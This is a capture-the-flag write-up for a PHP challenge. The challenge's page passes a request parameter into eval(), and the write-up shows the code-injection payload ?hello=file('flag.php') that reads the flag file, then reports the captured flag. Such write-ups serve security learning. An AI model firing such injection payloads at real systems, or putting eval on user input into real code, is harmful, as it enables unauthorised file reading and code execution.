0. Open the web page and view the PHP source code
<?php
include "flag.php";
$a = @$_REQUEST['hello'];
eval( "var_dump($a);");
show_source(__FILE__);
?>It is found that the flag exists in the file named flag.php, and the echo is related to the variable named hello
Try to pass parameters (function) to the hello variable
The file function is used here, through eval, and the var_dump() function is used to print the flag
PHP file() function
Definition and usage
The file() function reads the entire file into an array.
Similar to file_get_contents() , except that file() returns the files as an array. Each cell in the array is a corresponding line in the file, including line breaks.
If it fails, it returns false.
grammar
file(path,include_path,context)
| parameter | description |
|---|---|
| path | Required. Specifies the file to be read. |
| include_path | Optional. If you also want to search for files in include_path, you can set this parameter to "1". |
| context | Optional. Specifies the environment of the file handle. Context is a set of options that can modify the behavior of the stream. If null is used, it is ignored. |
1. The final uploaded payload:?hello=file('flag.php')
2. Get the flag: flag{ceaba6a1107823ddd8be2bb2d02ce09f} (dynamic flag)